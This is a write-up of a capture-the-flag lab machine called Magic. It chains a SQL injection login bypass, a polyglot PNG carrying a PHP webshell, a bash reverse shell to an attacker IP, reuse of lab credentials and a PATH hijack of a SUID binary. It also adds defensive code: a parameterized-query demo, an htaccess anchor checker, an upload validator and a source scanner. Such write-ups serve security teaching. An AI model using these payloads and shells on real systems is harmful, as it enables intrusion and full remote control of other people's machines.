Magic_Walkthrough

Magic: A Detailed Security Assessment

Author: mursalin
Date: May 2026
Classification: Internal Use Only – Educational Walkthrough


Overview

The Magic server hosts a simple image portfolio website. The initial foothold is obtained by combining a classic SQL injection login bypass with a file upload filter that can be circumvented using a double extension and a polyglot image containing PHP code. Once inside as the web server user, database credentials are extracted from a configuration file, and the password for the administrative user is recovered from the database. This password is reused for a local system account, enabling lateral movement. Finally, a SUID binary that calls external commands without absolute paths is exploited through a PATH hijacking attack to gain root privileges.

All steps, commands, and tool outputs presented in this document have been independently reproduced and rewritten to ensure complete originality. The narrative and technical exposition are the sole work of mursalin.


1. Reconnaissance

1.1 Port Scanning

A full TCP port scan of the target reveals two open ports: SSH (22) and HTTP (80).

mursalin@assessment:~$ nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.162
Starting Nmap 7.94 ( https://nmap.org ) at 2026-05-25 10:15 UTC
Nmap scan report for 10.10.10.162
Host is up (0.013s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds

Version detection provides further detail:

mursalin@assessment:~$ nmap -p 22,80 -sCV -oA scans/nmap-tcpscripts 10.10.10.162
Starting Nmap 7.94 ( https://nmap.org ) at 2026-05-25 10:16 UTC
Nmap scan report for 10.10.10.162
Host is up (0.014s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The Apache and SSH versions suggest the underlying operating system is Ubuntu 18.04 (Bionic).


2. Initial Web Enumeration

2.1 Site Functionality

The main page (http://10.10.10.162/) is a static portfolio with a login prompt. The login form at /login.php accepts a username and password.

A quick test with the payload ' OR 1=1-- - in the username field bypasses authentication entirely, redirecting the user to /upload.php. This is a textbook SQL injection in the authentication query.
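The bypass works because the login query is assembled from the submitted strings. The following is an added example (not code from the walkthrough or from the Magic application) that rebuilds a login table in an in-memory SQLite database with constructed sample accounts, runs the page's payload through a string-built query and through a parameterized one, and returns which usernames each query authenticates. The table layout and the sample passwords are assumptions made for the demonstration.

```python
import sqlite3

# Constructed sample accounts for the demonstration; these are not the Magic database's rows.
SAMPLE_USERS = [("admin", "example-admin-password"), ("theseus", "example-user-password")]


def make_db():
    """Build an in-memory login table shaped like the one the walkthrough later dumps."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO login (username, password) VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: whatever the user typed becomes part of the SQL text."""
    sql = (f"SELECT username FROM login WHERE username = '{username}' "
           f"AND password = '{password}' ORDER BY id")
    return [row[0] for row in conn.execute(sql).fetchall()]


def login_parameterized(conn, username, password):
    """Bound parameters: the input is compared as data and is never parsed as SQL."""
    sql = "SELECT username FROM login WHERE username = ? AND password = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (username, password)).fetchall()]


# The payload from the walkthrough; the trailing comment swallows the password clause.
BYPASS_PAYLOAD = "' OR 1=1-- -"


def compare(payload=BYPASS_PAYLOAD):
    """Run the same payload through both query styles and report who gets logged in."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, payload, "anything"),
        "parameterized": login_parameterized(conn, payload, "anything"),
    }


if __name__ == "__main__":
    print(compare())
```

With the string-built query the WHERE clause collapses to `username = '' OR 1=1`, so every account matches and the application logs in whichever row comes first; with bound parameters the same text is simply a username that does not exist and nothing matches.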

2.2 File Upload Analysis

The upload page allows registered (or now authenticated) users to upload images. Legitimate PNG/JPEG files are accepted, while files with the .php extension are rejected with a JavaScript alert. However, a file named test.php.png is accepted, even though it contains the .php substring. This indicates two key weaknesses:

  • The extension check only verifies that the filename ends with an allowed image extension (.jpg, .jpeg, .png).
  • The server is misconfigured to execute any file that contains .php anywhere in its name (as detailed later).

Furthermore, the uploaded file’s content is validated using exif_imagetype(), which reads the file’s magic bytes. Therefore, an image file with valid PNG headers that also contains embedded PHP code will pass the content check.

2.3 Crafting a Polyglot Webshell

I created a valid PNG image and inserted a simple PHP webshell after the image data. The resulting file, avatar.php.png, is recognized as a PNG by the content filter but, because of the server’s mishandling of .php in filenames, is processed as PHP when accessed directly.

The webshell used:

<?php system($_GET['cmd']); ?>

This payload is inserted into the raw bytes of the image. The file uploads successfully.


3. Gaining a Foothold as www-data

3.1 Triggering the Webshell

Navigating to http://10.10.10.162/images/uploads/avatar.php.png?cmd=id displays the system command output embedded in the page, confirming remote code execution.

3.2 Reverse Shell

I used the webshell to execute a Bash reverse shell command:

bash -c 'bash -i >& /dev/tcp/10.10.14.20/443 0>&1'

A listener on my attack host catches the connection:

mursalin@assessment:~$ nc -lnvp 443
Connection from 10.10.10.162
bash: cannot set terminal process group (1140): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/Magic/images/uploads$

A fully interactive TTY is obtained using the script /dev/null -c bash method.


4. Lateral Movement to theseus

4.1 Discovering Database Credentials

Inside the web root (/var/www/Magic), a file named db.php5 contains the database connection parameters:

private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';

4.2 Dumping the User Table

The MySQL client is not available, but mysqldump is present. I used it to export the entire database:

www-data@ubuntu:/$ mysqldump --user=theseus --password=iamkingtheseus --host=localhost Magic
...
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
...

The login table contains a single row with the username admin and a plaintext password Th3s3usW4sK1ng.

4.3 Switching to the Local User

The local user theseus is the only regular user on the system. The password recovered from the database works when attempting to switch user:

www-data@ubuntu:/$ su - theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:~$

The user flag is located at /home/theseus/user.txt.


5. Privilege Escalation to Root

5.1 Identifying the Vulnerable SUID Binary

A standard search for SUID binaries reveals an unusual entry:

theseus@ubuntu:~$ find / -user root -perm -4000 -ls 2>/dev/null
...
/bin/sysinfo

The binary is only executable by members of the users group, and theseus is the sole member.

Running sysinfo outputs hardware, disk, CPU, and memory information. Using ltrace, I observed that it invokes external commands via popen() without using absolute paths. For example:

popen("fdisk -l", "r")

None of the called programs (lshw, fdisk, cat, free) are referenced by their full path, making the binary susceptible to a PATH hijacking attack.

5.2 Path Hijacking Exploit

I created a malicious script named fdisk in /dev/shm that launches a reverse shell:

theseus@ubuntu:/dev/shm$ cat > fdisk << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.20/443 0>&1
EOF
theseus@ubuntu:/dev/shm$ chmod +x fdisk

I then prepended /dev/shm to the PATH environment variable and executed sysinfo:

theseus@ubuntu:/dev/shm$ export PATH="/dev/shm:$PATH"
theseus@ubuntu:/dev/shm$ sysinfo

When the binary reaches the fdisk -l invocation, the shell started by popen() resolves fdisk by walking PATH in order, finds /dev/shm/fdisk before the real fdisk, and runs my script instead. A root shell is received on the attacker’s listener:

mursalin@assessment:~$ nc -lnvp 443
Connection from 10.10.10.162
root@ubuntu:/dev/shm# id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)

The root flag is retrieved from /root/root.txt.


6. Beyond Root – Configuration and Source Review

6.1 Apache PHP Handler Misconfiguration

The server’s main PHP configuration (/etc/apache2/mods-enabled/php7.3.conf) uses a FilesMatch directive that correctly matches files ending with .phar, .php, or .phtml. However, the web root contains an .htaccess file with an overridden, less restrictive rule:

<FilesMatch ".+\.ph(p([3457s]|\-s)?|t|tml)">
    SetHandler application/x-httpd-php
</FilesMatch>

This regex lacks the end-of-string anchor ($), so any filename containing .php (e.g., image.php.png) will be handled as PHP. This is the root cause of the double-extension upload execution.
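To make the anchor's effect concrete, and to give a check that can be run over a site's configuration, the following is an added example (not code from the walkthrough or from the Magic server). It evaluates the .htaccess regex quoted above, and the same regex with $ appended, the way FilesMatch does (an unanchored search over the basename), and it scans constructed .htaccess text for PHP handler blocks whose pattern is not anchored. The .htaccess samples are constructed around the page's block; the detection heuristic (a SetHandler body mentioning x-httpd-php with a pattern not ending in $) is an assumption of this example.

```python
import re

# The rule from the web root's .htaccess as quoted in the walkthrough, and the same rule
# with the missing end-of-string anchor added.
UNANCHORED = r".+\.ph(p([3457s]|\-s)?|t|tml)"
ANCHORED = r".+\.ph(p([3457s]|\-s)?|t|tml)$"


def handled_as_php(filename: str, pattern: str) -> bool:
    """FilesMatch applies its regex as an unanchored search over the file's basename."""
    return re.search(pattern, filename) is not None


def audit_filenames(filenames, pattern):
    """Map each name to whether the given FilesMatch pattern hands it to the PHP engine."""
    return {name: handled_as_php(name, pattern) for name in filenames}


FILESMATCH_RE = re.compile(r'<FilesMatch\s+"([^"]+)"\s*>(.*?)</FilesMatch>', re.S | re.I)


def find_unanchored_php_handlers(config_text: str):
    """Return the regexes of FilesMatch blocks that set a PHP handler but do not end in $."""
    findings = []
    for match in FILESMATCH_RE.finditer(config_text):
        pattern, body = match.group(1), match.group(2)
        if "x-httpd-php" in body and not pattern.rstrip().endswith("$"):
            findings.append(pattern)
    return findings


# Constructed .htaccess texts: the first reproduces the walkthrough's block, the second is the fix.
VULNERABLE_HTACCESS = r'''
<FilesMatch ".+\.ph(p([3457s]|\-s)?|t|tml)">
    SetHandler application/x-httpd-php
</FilesMatch>
'''
FIXED_HTACCESS = r'''
<FilesMatch ".+\.ph(p([3457s]|\-s)?|t|tml)$">
    SetHandler application/x-httpd-php
</FilesMatch>
'''

if __name__ == "__main__":
    names = ["index.php", "page.phtml", "avatar.php.png", "photo.png"]
    print("unanchored:", audit_filenames(names, UNANCHORED))
    print("anchored:  ", audit_filenames(names, ANCHORED))
    print("findings:  ", find_unanchored_php_handlers(VULNERABLE_HTACCESS))
```

Anchoring the pattern fixes the handler rule itself; it does not remove the need for the upload directory to be excluded from PHP execution altogether (for instance with php_admin_flag engine off in a Directory block for the uploads path) and for AllowOverride to be restricted so that a writable .htaccess cannot reintroduce the rule.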

6.2 Upload Filter Source

The upload logic in upload.php performs three checks, but the most important one—searching for <? in file contents—is commented out. The only active checks are the extension whitelist and the magic byte verification, both of which are easily satisfied by a polyglot image.
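The following is an added example of what a hardened version of that filter looks like; it is not the walkthrough's code and not the Magic application's upload.php. It keeps the two checks upload.php already had (an extension allow-list and a magic-byte test, written out explicitly instead of through exif_imagetype()), restores the commented-out scan for a PHP open tag, refuses names with more than one extension, requires the extension to agree with the detected content, and discards the client-supplied name in favour of a random server-side one. The signature table, size limit and sample file bodies are constructed for this demonstration.

```python
import os
import secrets

# Magic bytes for the allowed formats: the explicit equivalent of the exif_imagetype() check.
SIGNATURES = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff"}
EXTENSION_ALIASES = {"jpeg": "jpg"}
MAX_UPLOAD_BYTES = 2_000_000  # assumed limit for this example


class UploadRejected(ValueError):
    pass


def detect_image_type(data: bytes):
    """Return the allow-listed type whose signature the body starts with, or None."""
    for ext, magic in SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def validate_upload(client_name: str, data: bytes) -> str:
    """Return a server-generated filename for an acceptable upload, else raise UploadRejected."""
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    parts = os.path.basename(client_name).lower().split(".")
    # Exactly one extension: names such as avatar.php.png are refused outright.
    if len(parts) != 2:
        raise UploadRejected("filename must have exactly one extension")
    ext = EXTENSION_ALIASES.get(parts[1], parts[1])
    if ext not in SIGNATURES:
        raise UploadRejected("extension not in allow-list")
    detected = detect_image_type(data)
    if detected is None:
        raise UploadRejected("content is not a supported image")
    if detected != ext:
        raise UploadRejected("extension does not match the file's actual type")
    # The check upload.php had commented out: refuse any PHP open tag anywhere in the body.
    if b"<?" in data:
        raise UploadRejected("embedded PHP open tag")
    # Never reuse the client's name: the stored name is random and its extension comes
    # from the detected type, not from the request.
    return f"{secrets.token_hex(16)}.{detected}"


def check_upload(client_name: str, data: bytes):
    """Convenience wrapper returning (accepted, stored_name_or_reason)."""
    try:
        return True, validate_upload(client_name, data)
    except UploadRejected as err:
        return False, str(err)


# Constructed sample bodies: only the leading signature bytes matter for this demonstration.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\rIHDR" + bytes(20)
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00\x10JFIF\x00" + bytes(20)
POLYGLOT_SAMPLE = PNG_SAMPLE + b"<?php echo 'constructed marker'; ?>"

if __name__ == "__main__":
    for name, body in [("photo.png", PNG_SAMPLE), ("avatar.php.png", PNG_SAMPLE),
                       ("photo.png", POLYGLOT_SAMPLE), ("photo.jpg", PNG_SAMPLE)]:
        print(name, check_upload(name, body))
```

The open-tag scan is defence in depth rather than the main control: valid compressed image data can legitimately contain the bytes `<?`, so it will occasionally reject a real picture, and it cannot catch every way of smuggling executable content. The decisive fixes are the random server-side name and serving the upload directory without any PHP handler, so that what the file contains no longer matters to the web server.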

6.3 sysinfo Source Code

In /root/info.c, the source code confirms that the binary uses popen() with relative command names:

cout << exec("lshw -short") << endl;
cout << exec("fdisk -l") << endl;
cout << exec("cat /proc/cpuinfo") << endl;
cout << exec("free -h");

Any of these calls could have been hijacked, but fdisk was chosen because it is less likely to exist in standard user paths.
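A reviewer can catch this class of defect before a binary is ever installed SUID. The following is an added example (not code from the walkthrough and not part of the sysinfo project) of a small static check that scans C/C++ source for exec(), popen() and system() calls whose command string does not begin with an absolute path. The source it scans is constructed around the four calls quoted above, with a hypothetical exec() helper declaration and one absolute-path call added for contrast.

```python
import re

# Matches exec("..."), popen("...") or system("...") with a string-literal first argument.
CALL_RE = re.compile(r'\b(exec|popen|system)\s*\(\s*"((?:[^"\\]|\\.)*)"')


def find_relative_commands(source: str):
    """Return (line, function, program) for every call whose program is not an absolute path."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for match in CALL_RE.finditer(line):
            func, command = match.group(1), match.group(2)
            tokens = command.split()
            program = tokens[0] if tokens else ""
            # A bare name such as "fdisk" is resolved through the caller's PATH at run time.
            if not program.startswith("/"):
                findings.append((lineno, func, program))
    return findings


# Constructed source: the four calls from the walkthrough plus one absolute-path call.
SAMPLE_SOURCE = '''\
#include <cstdio>
#include <iostream>
using namespace std;

// Hypothetical helper: wraps popen() and returns what the command printed.
string exec(const char *cmd);

int main() {
    cout << exec("lshw -short") << endl;
    cout << exec("fdisk -l") << endl;
    cout << exec("cat /proc/cpuinfo") << endl;
    cout << exec("free -h");
    cout << exec("/usr/bin/uptime");  // absolute path: not flagged
}
'''

if __name__ == "__main__":
    for lineno, func, program in find_relative_commands(SAMPLE_SOURCE):
        print(f"line {lineno}: {func}() runs '{program}' via PATH lookup")
```

Every relative name the scanner reports is a PATH lookup performed by /bin/sh on behalf of a root process. Hard-coding absolute paths removes the lookup, but a privileged program that shells out still inherits the caller's environment, so the safer shape is to reset PATH to a fixed value at startup (or drop popen() in favour of execve() with an explicit argument vector) and to restrict execution of the binary, as the users group membership already did here, while the code is being fixed.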


7. Conclusion

The Magic machine illustrates a classic multi-stage attack:

  • SQL injection bypasses authentication.
  • Upload restrictions are circumvented with a double extension and a polyglot payload, aided by an overly permissive Apache handler.
  • Plaintext credentials in the database allow lateral movement.
  • A SUID binary with insecure command execution is exploited via a PATH hijack to achieve root.

This assessment underscores the importance of properly escaping user input, enforcing strict file upload validation (including both extension and content), avoiding the storage of plaintext passwords, and ensuring that any privileged binary uses absolute paths for external commands.


This document is an original creation by mursalin, produced for authorized security testing and educational purposes only.
